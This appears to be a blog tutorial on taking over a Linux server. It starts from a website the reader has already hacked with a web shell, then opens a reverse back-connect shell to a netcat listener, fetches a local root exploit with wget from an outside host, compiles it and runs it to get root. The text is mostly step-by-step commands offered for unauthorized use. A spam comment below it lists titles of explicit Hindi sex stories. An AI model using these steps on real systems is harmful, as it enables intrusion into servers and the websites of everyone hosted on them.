Server Rooting Tutorial

I will show you how to exploit a Linux server and gain root access. This will benefit you in many ways, for example having control of all websites hosted on the server. Enough talking, let's begin!

Requirements for this tutorial:


- A shelled website.

- NetCat installed on your computer.
- Patience
- Port 443 or any other except 80 opened on your router.

Okay, first let's navigate to our shell. If the shell is GNY, you will see something like 'Back Connect'. Go there. Now you see 3 textboxes. Bind to bin/shor backconnect. Type in your IP and the port you want the server to connect (it must be opened on your router.). Now do not press backconnect yet. Download NetCat here:


www.downloadnetcat.com


Extract the files to your desktop in a folder. Now go to Run>cmd. Open cmd. Now type:


cd


Replace with the path of netcat. Okay, now type:


nc -lnvp


Replace with the port you opened and used on the shell.


Now it should display something like this:


Listening on port [any] ...


Minimze this window, and go on the web shell. Type in your IP address and port, click backconnect. If you did all right, and the server does not have a firewall and if your ports are forwarded correctly, you should see an incoming connection from the server. You have a shell! Now you can type 'id' to see your current ID. Let's say your ID is 23. You have control over your website only. But not for long. Now type 'uname -a'. You will get the full kernel version. Simply copy it and google for local root exploits. Let's say it is 2.6.18 2008 version... Hmm that is pretty outdated! Well, let's exploit it. Cd to the tmp directory, that is always writeable.


Type this:


cd /tmp


Now let's make a folder for the exploit.


mkdir exploit


cd into this folder.


cd exploit


Now comes the tricky part. We will use h00lyshit exploit for this kernel. Type:


wget http://goodbye.fileave.com/localroot.c


Now type 'ls'. You should see localroot.c in this folder. We need to compile it. Type:


gcc localroot.c -o h00lyshit


Now type 'ls' and you should see 2 files, localroot.c and h00lyshit. h00lyshit requires a large file on the server in order to get root access, so let's create one. Type this and hit enter:


dd if=/dev/urandom of=largefile count=2M


This will create a large file, where largefile is the name of it. This can take up to 5 minutes. Once ready, chmod hoolyshit and largefile to 777, so:


chmod 777 h00lyshit

chmod 777 largefile

Now let's run the exploit! Type this:


./h00lyshit largefile


Now wait, wait for about 3 minutes. If the kernel is not patched and if it is the right version, you are root! Type 'id' and you will see:


uid=0(root)


You have successfully gained root!

1 comments:

sunita said...

Hindi Latest Sex Stories From Bhauja.com
रात-दिन तुम्हारा लंड अपनी चूत में रखना है (Raat Din Tumhara Lund Chut me Rakhna hai)

शादी के बाद चूत की प्यास (Shadi Ke Baad Chut Ki Pyas)

भाभी ने छोटी बहन को चुदवाया

अपनी बीवी समझना (Apni Biwi Samajhna)

पराये मर्द के नीचे लेट कर लिया मजा-3

भाभी और उसकी बहन को जयपुर में चोदा

रीना ने अपनी सील तुड़वाई (Rina Ne Apne Seal Tudyai)

विधवा भाभी की चुदाई-2

शर्म, हया, लज्जा और चुदाई का मजा-2

प्रेम के अनमोल क्षण-1

भाभी तड़प गई ( Bhabhi Tadap Gayi)

रचना की चूत की खुजली (Rachna Ki Chut Ki Khujli)

भाभी की गाँड-चुदाई (Bhabhi Ki Gand Chudai Badi Kaske)

मेरी सीधी सरल भाभी (Meri Sidhi Saral Bhabhi)

Chacheri Bahen Ke Sone Ke Bad Nanga Karke Sab Kuch Dekha

Subah 5 Baje Padoswali Pinky Ko Choda (Long)

दोस्त की शादीशुदा बहन को चोदा-2

मेरी बेवफा बीवी

एक शाम अनजान हसीना के नाम

प्रेम के अनमोल क्षण-1 ( Prem Ke Anmol Khyan -1)
प्रेम के अनमोल क्षण-2 (Prem Ke Anmol Khyan - 2)

अब मैं तुम्हारी हो गई-2 (Ab Mein Tumhari Ho Gayi -2)

फरेज़ को पता है (Pharenj Ko Pata He)

कुड़ी पतंग हो गई (Kudi Patanga Ho Gayi)

एक जल्दी वाला राउंड (Ek Jaldi Bala Round)

Komal ki Komal Aur Reshma ki Reshmi Chut

Ek Doctor Hi Ye Samaz Sakta Hai

Pati Ke Batije Aur Ek Punjabi Loure Se Chudwaya

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | coupon codes